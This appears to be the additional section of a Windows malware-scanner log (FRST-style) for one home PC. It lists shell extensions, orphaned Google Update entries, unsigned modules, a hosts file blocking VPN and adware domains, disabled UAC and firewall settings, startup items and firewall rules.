CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll (Google Inc -> Google LLC)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll (Google Inc -> Google LLC)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.302\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\FileSyncApi64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll -> No File
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [DivXShellExtensionItem] -> {48A8A3B0-57E8-4F2B-A49D-19E02B92377B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [DivXShellExtensionItem64] -> {6B49A276-0DBA-43F4-BC96-A841AD11B40B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => c:\program files (x86)\real\realplayer\RPDS\Bin64\rpcloudview.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-03-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32-x32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32: [vidc.yv12] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32-x32: [VIDC.LAGS] => lagarith.dll
HKLM\...\Drivers32: [vidc.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [179200 2009-01-25] () [File not signed]
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\Vladana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) =============
 
2013-05-18 17:25 - 2013-05-18 17:25 - 001350656 _____ ( ) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNGadgetClass\10d2c6adb5906a1d7bbeb75d2a713c07\PFNGadgetClass.ni.dll
2017-09-02 13:47 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-09-02 13:47 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-06-05 02:08 - 2014-05-19 16:19 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2018-06-05 02:08 - 2014-10-31 15:40 - 001498112 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000113664 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Tasks.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000139776 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Utility.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000758784 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Core.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 001778688 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Ctrls.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000046080 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Localization.dll
2013-02-20 21:31 - 2006-12-11 02:14 - 000043008 _____ () [File not signed] C:\Program Files (x86)\WinRar\rarext64.dll
2011-12-16 15:37 - 2011-12-16 15:37 - 002437632 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNCommon.dll
2011-12-16 15:38 - 2011-12-16 15:38 - 002246144 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNDevice.dll
2011-12-22 09:03 - 2011-12-22 09:03 - 002281984 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNWLAN.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000421888 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNLocSet\b7cc59ff84258f2c78492c7ef6c33d6e\PFNLocSet.ni.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000473088 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNSwData\9a909070ecd70366e5c577eb52b4bbda\PFNSwData.ni.dll
2012-03-08 12:17 - 2012-03-08 12:17 - 000333312 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\BTHSSupplicant.dll
2012-03-01 10:52 - 2012-03-01 10:52 - 000105472 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\UsR3IoPort.dll
2012-03-29 06:37 - 2012-03-29 06:37 - 000498176 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\P2PSupplicant.dll
2012-04-17 18:35 - 2012-04-17 18:35 - 000168448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\PsRegApi.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000284160 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\TraceApi.dll
2012-04-17 18:36 - 2012-04-17 18:36 - 003280896 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\AmtWsMan.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000102400 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\DbEngine.dll
2012-04-17 18:38 - 2012-04-17 18:38 - 000104448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IntStngs.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000054272 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2012-04-17 18:46 - 2012-04-17 18:46 - 000545792 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\MurocApi.dll
2012-04-17 18:50 - 2012-04-17 18:50 - 000324608 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\panihvint.dll
2012-04-17 18:43 - 2012-04-17 18:43 - 001051136 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\PfMgrApi.dll
2012-04-17 18:51 - 2012-04-17 18:51 - 000178176 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\Ps7ZCfgS.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000020992 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\S24MUDLL.dll
2012-04-17 18:45 - 2012-04-17 18:45 - 002463744 _____ (Intel® Corporation) [File not signed] C:\Windows\System32\IWMSSvc.dll
2006-10-26 13:44 - 2006-10-26 13:44 - 000123904 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\csm.dll
2006-10-26 13:45 - 2006-10-26 13:45 - 000247296 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\msdbg2.dll
2012-06-26 13:08 - 2012-06-26 13:08 - 000026112 _____ (Nokia) [File not signed] C:\Program Files (x86)\Nokia\Nokia PC Suite 7\Lang\PhoneBrowser_eng-us.nlr
2012-06-26 11:58 - 2012-06-26 11:58 - 001262592 _____ (Nokia) [File not signed] C:\Program Files (x86)\Nokia\Nokia PC Suite 7\NGSCM64.DLL
2012-06-26 13:08 - 2012-06-26 13:08 - 000572928 _____ (Nokia) [File not signed] C:\Program Files (x86)\Nokia\Nokia PC Suite 7\Resource\PhoneBrowser_Nokia.ngr
2012-04-17 17:52 - 2012-04-17 17:52 - 001830912 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2017-09-02 13:47 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-06-05 02:08 - 2014-10-31 15:41 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSProducstInfo.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:94A19129 [260]
 
==================== Safe Mode (Whitelisted) ==================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer trusted/restricted ==========
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2019-11-09 17:42 - 2019-11-09 17:42 - 000002330 ____R C:\Windows\system32\drivers\etc\hosts
0.0.0.0 hss.hsselite.com
0.0.0.0 www.hss.hsselite.com
0.0.0.0 d1v9mrqde8r3oj.cloudfront.net
0.0.0.0 www.d1v9mrqde8r3oj.cloudfront.net
0.0.0.0 api.hsselite.com
0.0.0.0 www.api.hsselite.com
0.0.0.0 hsselite.com/trial/step2.php
0.0.0.0 www.hsselite.com/trial/step2.php
0.0.0.0 anchorfree.com
0.0.0.0 www.anchorfree.com
0.0.0.0 box.anchorfree.net
0.0.0.0 www.box.anchorfree.net
0.0.0.0 rpt.anchorfree.net
0.0.0.0 www.rpt.anchorfree.net
0.0.0.0 123.box.anchorfree.net
0.0.0.0 www.123.box.anchorfree.net
0.0.0.0 anchorfree.us
0.0.0.0 www.anchorfree.us
0.0.0.0 delivery.anchorfree.us/land.php
0.0.0.0 www.delivery.anchorfree.us/land.php
0.0.0.0 rss2search.com
0.0.0.0 www.rss2search.com
0.0.0.0 mefeedia.com
0.0.0.0 www.mefeedia.com
0.0.0.0 a433.com
0.0.0.0 www.a433.com
0.0.0.0 techbrowsing.com
0.0.0.0 www.techbrowsing.com
0.0.0.0 techbrowsing.com/away.php
0.0.0.0 www.techbrowsing.com/away.php
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\PC Connectivity Solution\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x86;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x64;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\QuickTime\QTSystem\
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(If an entry is included in the fixlist, it will be removed.)
 
MSCONFIG\Services: BstHdAndroidSvc => 2
MSCONFIG\Services: BstHdLogRotatorSvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RealPlayer Cloud Service => 2
MSCONFIG\Services: RealPlayerUpdateSvc => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => C:\Windows\pss\ZenMate.bat.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: Google Update => "C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: NSU_agent => "C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe"
MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Vladana\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: Wondershare Helper Compact.exe => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{418A7595-F489-448D-A132-2A9519236EF0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Mobile Wireless Group -> )
FirewallRules: [{B0E6337C-DD13-46CD-A572-58359114E70E}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{5B4B9E35-FBA6-4F36-8798-35D35E29E74B}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{B1CC60A0-4651-4E6D-A4FA-32240C388099}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{A0A9A6FA-AE67-4AB9-B612-32D06F124746}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{CE426DDA-632D-4252-8AF5-B3999BF81124}] => (Allow) C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CDC85982-754B-4DE3-977B-6E479A26C388}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F565ACF8-37C4-4665-A110-386DCCDF81E9}] => (Allow) LPort=2869
FirewallRules: [{BA538C52-47F4-4638-88FB-D4E100881E6A}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{838DFD5B-BE28-4A8A-9D48-591EFEF35AB6}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [UDP Query User{7BCDD032-7F97-4FE8-ADB0-130474CDDD9F}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [{DAA4242B-32CB-43E0-B514-40A492583C52}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{87CC937C-627E-4461-A86D-A01FA1D52711}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{787EA532-6389-4D57-8CB4-56ED49F60E38}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [{F0F6824E-F9E8-401C-92A1-52EE1D31841E}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [TCP Query User{BE9D298D-4B00-4F7D-AA02-CE4B8C269C09}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [UDP Query User{010D4FEB-5458-4625-B346-3F087D27F4A3}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [TCP Query User{DF4734DC-C765-4167-986C-24CF01DB1137}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [UDP Query User{E878D949-B0E7-411A-8F5A-335EE806B7C2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C1202602-2671-439A-8CF4-FFA06CC539FB}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{3F9714B5-446C-4FD2-91A7-085A9AAF37D8}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [TCP Query User{813FD61F-108E-4C8F-8713-5C5C65A07F20}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{94D1C3B8-E5D6-406D-8550-D0FB1A8AFD18}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
